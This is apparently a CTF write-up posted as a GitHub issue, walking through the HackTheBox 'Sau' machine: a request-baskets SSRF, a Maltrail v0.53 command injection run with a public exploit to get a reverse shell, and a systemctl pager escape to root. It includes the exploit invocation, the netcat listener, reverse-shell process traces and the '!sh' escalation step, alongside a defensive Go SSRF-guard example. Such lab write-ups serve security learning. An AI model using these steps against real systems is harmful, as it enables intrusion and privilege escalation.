roaris / ctf-log


HackTheBox: Sau (Machine Easy) #37

Open roaris opened 4 months ago

roaris commented 4 months ago

https://app.hackthebox.com/machines/Sau

$ nmap -sC -sV -Pn 10.10.11.224
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-06 14:54 JST
Nmap scan report for 10.10.11.224
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Mon, 06 May 2024 05:50:01 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[\w\d\-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Mon, 06 May 2024 05:49:32 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Mon, 06 May 2024 05:49:32 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.53 seconds
roaris commented 4 months ago

Port 80 doesn't accept connections. A web application is running on port 55555.

It's an application where you create a "Basket" with its own URL and can then inspect the requests sent to that URL. With a Basket named 3ze9avc, you can inspect requests sent to http://10.10.11.224:55555/3ze9avc.

Let me look at the traffic in Burp.

roaris commented 4 months ago

When you create a Basket (POST /api/baskets/<basket name>), a token is returned and stored in Local Storage. This token is sent in the Authorization header when viewing the requests in a Basket or deleting the Basket. If the token is wrong, a 401 is returned. I tried SQL injection for a start, but it didn't go through.

If you know the Master Token, you can view every Basket.

roaris commented 4 months ago

I had assumed this was a custom web application, but at the bottom of the page it says Powered by request-baskets | Version: 1.2.1.

https://github.com/darklynx/request-baskets : apparently a service for purposes like providing webhook URLs for testing.

I searched exploit-db for request-baskets but nothing came up. I looked at the Releases, but there don't seem to be any major vulnerabilities (it does say "Minor bug and security fixes", but without details).

Googling "request-baskets 1.2.1 cve" turned something up: an SSRF vulnerability, https://github.com/entr0pie/CVE-2023-27163. So there are things that aren't listed on exploit-db...

roaris commented 4 months ago

It seems to be a vulnerability where setting a Basket's Forward URL to a URL on the internal network allows SSRF, but I can't think of anything I could do with it. You can't get the contents of Baskets you don't have permission to view (a request to a Basket from the inside still has no Authorization header, so it just returns 401).

roaris commented 4 months ago

Then I remembered that port 80 exists.

Set the Forward URL like this (screenshot),

send a request to the Basket, and you can see the response from port 80.

$ curl http://10.10.11.224:55555/h7krcrt
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta http-equiv="Content-Type" content="text/html;charset=utf8">
        <meta name="viewport" content="width=device-width, user-scalable=no">
        <meta name="robots" content="noindex, nofollow">
        <title>Maltrail</title>
        <link rel="stylesheet" type="text/css" href="css/thirdparty.min.css">
        <link rel="stylesheet" type="text/css" href="css/main.css">
        <link rel="stylesheet" type="text/css" href="css/media.css">
        <script type="text/javascript" src="js/errorhandler.js"></script>
        <script type="text/javascript" src="js/thirdparty.min.js"></script>
        <script type="text/javascript" src="js/papaparse.min.js"></script>
    </head>
    <body>
        <div id="header_container" class="header noselect">
            <div id="logo_container">
                <span id="logo"><img src="images/mlogo.png" style="width: 25px">altrail</span>
            </div>
            <div id="calendar_container">
                <center><span id="spanToggleHeatmap" style="cursor: pointer"><a class="header-a header-period" id="period_label"></a><img src="images/calendar.png" style="width: 25px; height: 25px; vertical-align: top"></span></center>
            </div>
            <ul id="link_container">
                <li class="header-li"><a class="header-a" href="https://github.com/stamparm/maltrail/blob/master/README.md" id="documentation_link" target="_blank">Documentation</a></li>
                <li class="header-li link-splitter">|</li>
                <li class="header-li"><a class="header-a" href="https://github.com/stamparm/maltrail/wiki" id="wiki_link" target="_blank">Wiki</a></li>
                <li class="header-li link-splitter">|</li>
<!--                <li class="header-li"><a class="header-a" href="https://docs.google.com/spreadsheets/d/1lJfIa1jPZ-Vue5QkQACLaAijBNjgRYluPCghCVBMtHI/edit" id="collaboration_link" target="_blank">Collaboration</a></li>
                <li class="header-li link-splitter">|</li>-->
                <li class="header-li"><a class="header-a" href="https://github.com/stamparm/maltrail/issues/" id="issues_link" target="_blank">Issues</a></li>
                <li class="header-li link-splitter hidden" id="login_splitter">|</li>
                <li class="header-li"><a class="header-a hidden" id="login_link">Log In</a></li>
                <li class="header-li"></li>
            </ul>
        </div>

        <div id="heatmap_container" class="container hidden" style="text-align: center">
            <div>
                <button id="heatmap-previous" class="ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only" type="button" role="button">
                    <span class="ui-icon ui-icon-carat-1-w"></span>
                </button>
                <button id="heatmap-next" class="ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only" type="button" role="button">
                    <span class="ui-icon ui-icon-carat-1-e"></span>
                </button>
            </div>

            <div style="display: inline-block; float: top; vertical-align: top; margin-top: 5px">
                <div id="cal-heatmap" style="display: inline-block"></div>
            </div>
        </div>

        <div id="main_container" class="container hidden">
            <div id="status_container" style="width: 100%; text-align: center">
                <div>
                    <ul style="list-style: outside none none; overflow: hidden; font-family: sans-serif; padding: 0px; display: inline-block; white-space: nowrap">
                        <li id="btnDrawThreats" class="status-button noselect" style="background: rgb(31, 119, 180); background: radial-gradient(rgb(174, 199, 232) 0%, rgb(31, 119, 180) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Threats">
                            <h4 id="threats_count">-</h4>
                            <span class="dynamicsparkline" id="threats_sparkline"></span>
                            <h6>Threats</h6>
                        </li>
                        <li id="btnDrawEvents" class="status-button noselect" style="background: rgb(255, 127, 14); background: radial-gradient(rgb(255, 187, 120) 0%, rgb(255, 127, 14) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Events">
                            <h4 id="events_count">-</h4>
                            <span class="dynamicsparkline" id="events_sparkline"></span>
                            <h6>Events</h6>
                        </li>
                        <li id="btnDrawSeverity" class="status-button noselect" style="background: rgb(44, 160, 44); background: radial-gradient(rgb(152, 223, 138) 0%, rgb(44, 160, 44) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Severity">
                            <h4 id="severity_count">-</h4>
                            <span class="dynamicsparkline" id="severity_sparkline"></span>
                            <h6>Severity</h6>
                        </li>
                        <li id="btnDrawSources" class="status-button noselect" style="background:rgb(214, 39, 40); background: radial-gradient(rgb(255, 152, 150) 0%, rgb(214, 39, 40) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Sources">
                            <h4 id="sources_count">-</h4>
                            <span class="dynamicsparkline" id="sources_sparkline"></span>
                            <h6>Sources</h6>
                        </li>
                        <li id="btnDrawTrails" class="status-button noselect" style="background:rgb(148, 103, 189); background: radial-gradient(rgb(197, 176, 213) 0%, rgb(148, 103, 189) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Trails">
                            <h4 id="trails_count">-</h4>
                            <span class="dynamicsparkline" id="trails_sparkline"></span>
                            <h6>Trails</h6>
                        </li>
                    </ul>
                </div>
                <div>
                    <!--<label>title</label>-->
                    <img id="graph_close" src="images/close.png" class="hidden" title="close">
                </div>
                <div id="chart_area">
                </div>
            </div>

            <table width="100%" border="1" cellpadding="2" cellspacing="0" class="display compact" id="details">
            </table>
        </div>

        <noscript>
            <div id="noscript">
                Javascript is disabled in your browser. You must have Javascript enabled to utilize the functionality of this page.
            </div>
        </noscript>

        <div id="bottom_blank"></div>
        <div class="bottom noselect">Powered by <b>M</b>altrail (v<b>0.53</b>)</div>

        <ul class="custom-menu">
            <li data-action="hide_threat">Hide threat</li>
            <li data-action="report_false_positive">Report false positive</li>
        </ul>
        <script defer type="text/javascript" src="js/main.js"></script>
    </body>
</html>

Checking Proxy Response lets you see the response from the Forward URL. Checking Expand Forward Path means that, for example, a request to http://10.10.11.224:55555/h7krcrt/js/main.js is forwarded to http://127.0.0.1/js/main.js.
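As an added example, not code from request-baskets or from this writeup: a Go guard for a Basket's Forward URL that refuses loopback, private, link-local and unspecified destinations, which is the kind of check that would have stopped the forward to 127.0.0.1:80 above. The hostnames and addresses used in the demo and in the test resolver are made up.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
)

// Added example, not request-baskets code: a guard for a basket's Forward URL
// that refuses loopback, private, link-local and unspecified destinations, so
// the proxy feature cannot reach host-only services such as the port-80
// Maltrail instance above. Hostnames are resolved first, so a DNS name that
// points at 127.0.0.1 or a private range is refused as well.

var errBlocked = errors.New("forward URL points at a non-public address")

// Resolver abstracts DNS lookup (net.LookupIP in production, a fake in tests).
type Resolver func(host string) ([]net.IP, error)

func isPublicIP(ip net.IP) bool {
	return !(ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsUnspecified())
}

// ValidateForwardURL returns nil only for http(s) URLs whose host is a public
// IP literal or resolves exclusively to public addresses.
func ValidateForwardURL(raw string, lookup Resolver) error {
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("unsupported scheme %q", u.Scheme)
	}
	host := u.Hostname()
	if host == "" || host == "localhost" {
		return errBlocked
	}
	ips := []net.IP{net.ParseIP(host)}
	if ips[0] == nil { // not an IP literal: resolve the name
		if ips, err = lookup(host); err != nil {
			return fmt.Errorf("resolving %s: %w", host, err)
		}
	}
	for _, ip := range ips {
		if !isPublicIP(ip) {
			return errBlocked // one internal A/AAAA record is enough to refuse
		}
	}
	return nil
}

// The addresses below are constructed for the demo; 203.0.113.0/24 is
// documentation space. IP literals never reach the resolver, so this runs offline.
func main() {
	for _, raw := range []string{"http://203.0.113.10/hook", "http://127.0.0.1/", "http://10.0.0.5/", "ftp://203.0.113.10/"} {
		fmt.Println(raw, "->", ValidateForwardURL(raw, net.LookupIP))
	}
}
```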

roaris commented 4 months ago

I checked the links in the a tags. https://github.com/stamparm/maltrail : apparently Maltrail is a system for detecting malicious traffic. At the bottom of the HTML it says Powered by <b>M</b>altrail (v<b>0.53</b>), so Maltrail v0.53 is in use. https://docs.google.com/spreadsheets/d/1lJfIa1jPZ-Vue5QkQACLaAijBNjgRYluPCghCVBMtHI/edit : a mysterious spreadsheet (anyone can edit it, and there shouldn't be any important information in it).

I looked up Maltrail on exploit-db but nothing came up. Googling "Maltrail 0.53" did turn up https://github.com/spookier/Maltrail-v0.53-Exploit. Apparently it base64-encodes the payload to evade detection by WAFs and the like.

roaris commented 4 months ago

$ python exploit.py 10.10.14.20 8000 http://10.10.11.224:55555/h7krcrt got me a reverse shell.

$ nc -lvp 8000
listening on [any] 8000 ...
10.10.11.224: inverse host lookup failed: Unknown host
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.224] 48204
$ bash -i
bash -i
puma@sau:/opt/maltrail$ whoami
whoami
puma
roaris commented 4 months ago

Got user.txt.

puma@sau:/opt/maltrail$ cd /home
cd /home
puma@sau:/home$ ls
ls
puma
puma@sau:/home$ cd puma
cd puma
puma@sau:~$ ls
ls
user.txt
puma@sau:~$ cat user.txt
cat user.txt
9d56e21024c2d793518953262ae8fca9
roaris commented 4 months ago

sudo -l shows that /usr/bin/systemctl status trail.service can be run as root, but that only lets you check the status of trail.service, so it shouldn't lead to privilege escalation.

puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:~$ /usr/bin/systemctl status trail.service
/usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
     Active: active (running) since Mon 2024-05-06 05:40:02 UTC; 4h 23min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 916 (python3)
      Tasks: 22 (limit: 4662)
     Memory: 37.7M
     CGroup: /system.slice/trail.service
             ├─ 916 /usr/bin/python3 server.py
             ├─1453 /bin/sh -c logger -p auth.info -t "maltrail[916]" "Failed p…
             ├─1454 /bin/sh -c logger -p auth.info -t "maltrail[916]" "Failed p…
             ├─1463 sh
             ├─1464 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I…
             ├─1465 /bin/sh
             ├─1469 script /dev/null -c bash
             ├─1470 bash
             ├─1513 sudo /usr/bin/systemctl status trail.service
             ├─1514 /usr/bin/systemctl status trail.service
             ├─1515 pager
             ├─1516 sh -c /bin/bash -c /bin/bash
             ├─1517 /bin/bash
             ├─1569 /bin/sh -c logger -p auth.info -t "maltrail[916]" "Failed p…
             ├─1570 /bin/sh -c logger -p auth.info -t "maltrail[916]" "Failed p…
             ├─1573 sh
             ├─1574 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I…
             ├─1575 /bin/sh
             ├─1576 bash -i
             └─1590 /usr/bin/systemctl status trail.service

May 06 09:18:43 sau su[1485]: pam_unix(su:auth): authentication failure; l…=root
May 06 09:18:45 sau su[1485]: FAILED SU (to root) puma on pts/1
May 06 09:19:09 sau su[1486]: pam_unix(su:auth): authentication failure; l…=root
May 06 09:19:11 sau su[1486]: FAILED SU (to root) puma on pts/1
May 06 09:22:04 sau sudo[1506]: pam_unix(sudo:auth): authentication failur…=puma
Warning: journal has been rotated since unit was started and some journal files were not opened due to insufficient permissions, output may be incomplete.
Hint: Some lines were ellipsized, use -l to show in full.
roaris commented 4 months ago

/home/puma/.gnupg might be suspicious. GnuPG is apparently software for encryption. private-keys-v1.d is empty.

puma@sau:~$ ls -al
ls -al
total 32
drwxr-xr-x 4 puma puma 4096 Jun 19  2023 .
drwxr-xr-x 3 root root 4096 Apr 15  2023 ..
lrwxrwxrwx 1 root root    9 Apr 14  2023 .bash_history -> /dev/null
-rw-r--r-- 1 puma puma  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 puma puma 3771 Feb 25  2020 .bashrc
drwx------ 2 puma puma 4096 Apr 15  2023 .cache
drwx------ 3 puma puma 4096 Apr 15  2023 .gnupg
-rw-r--r-- 1 puma puma  807 Feb 25  2020 .profile
lrwxrwxrwx 1 puma puma    9 Apr 15  2023 .viminfo -> /dev/null
lrwxrwxrwx 1 puma puma    9 Apr 15  2023 .wget-hsts -> /dev/null
-rw-r----- 1 root puma   33 May  6 05:40 user.txt
puma@sau:~$ ls -al .gnupg
ls -al .gnupg
total 20
drwx------ 3 puma puma 4096 Apr 15  2023 .
drwxr-xr-x 4 puma puma 4096 Jun 19  2023 ..
drwx------ 2 puma puma 4096 Apr 15  2023 private-keys-v1.d
-rw------- 1 puma puma   32 Apr 15  2023 pubring.kbx
-rw------- 1 puma puma 1200 Apr 15  2023 trustdb.gpg
puma@sau:~$ ls -al .gnupg/private-keys-v1.d
ls -al .gnupg/private-keys-v1.d
total 8
drwx------ 2 puma puma 4096 Apr 15  2023 .
drwx------ 3 puma puma 4096 Apr 15  2023 ..
roaris commented 4 months ago

I'm stuck, so switching to Guided Mode.

Task9 : What is the full path to the application the user puma can run as root on Sau? Hint : Run the sudo -l command to see what applications the user can run as root. A : /usr/bin/systemctl

Task10 : What is the full version string for the instance of systemd installed on Sau? Hint : Refer to the man page for systemctl on how to find the systemd version installed on the system.

So that's where to look... I still can't see how running /usr/bin/systemctl status trail.service leads to privilege escalation... According to https://www.nixcraft.com/t/how-to-find-systemd-version-on-linux/3848, systemctl --version shows the systemd version.

puma@sau:~$ /usr/bin/systemctl --version
/usr/bin/systemctl --version
systemd 245 (245.4-4ubuntu3.22)
+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN2 -IDN +PCRE2 default-hierarchy=hybrid

A : systemd 245 (245.4-4ubuntu3.22)

Googling "systemd 245 privilege escalation" I found https://bugzilla.redhat.com/show_bug.cgi?id=2175611. https://security.sios.jp/vulnerability/systemd-security-vulnerability-20230307/ is easier to understand: when the terminal is small, the output of systemctl status is passed to less, and typing !sh at that point launches a shell. I didn't know such a vulnerability existed.

Task11 : What is the CVE ID for a local privilege escalation vulnerability that affects that particular systemd version? Hint : Search for terms like "Systemd Vulnerabilities" A : CVE-2023-26604

roaris commented 4 months ago

Got root.txt.

puma@sau:~$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!sshh!sh
# bash -i
bash -i
root@sau:/home/puma# whoami
whoami
root
root@sau:/home/puma# cd /root
cd /root
root@sau:~# ls
ls
go  root.txt
root@sau:~# cat root.txt
cat root.txt
cd0cd0fde253162d06453e02718cf510
roaris commented 4 months ago

Summary of the solution

  1. Notice that request-baskets v1.2.1 is in use
  2. Find that request-baskets v1.2.1 has an SSRF vulnerability
  3. Use the SSRF vulnerability to retrieve the HTML served on port 80
  4. Notice that Maltrail v0.53 is running on port 80
  5. Find that Maltrail v0.53 has a command injection vulnerability
  6. Get a reverse shell, obtain the puma user's privileges, and get user.txt
  7. Notice via sudo -l that /usr/bin/systemctl status trail.service can be run as root
  8. Check the systemd version with systemctl --version and find that this version has a local privilege escalation vulnerability
  9. Run sudo /usr/bin/systemctl status trail.service, obtain root privileges, and get root.txt